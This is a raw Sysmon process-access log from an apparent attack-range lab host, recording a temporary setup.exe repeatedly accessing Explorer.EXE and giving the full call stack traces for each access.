13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Wind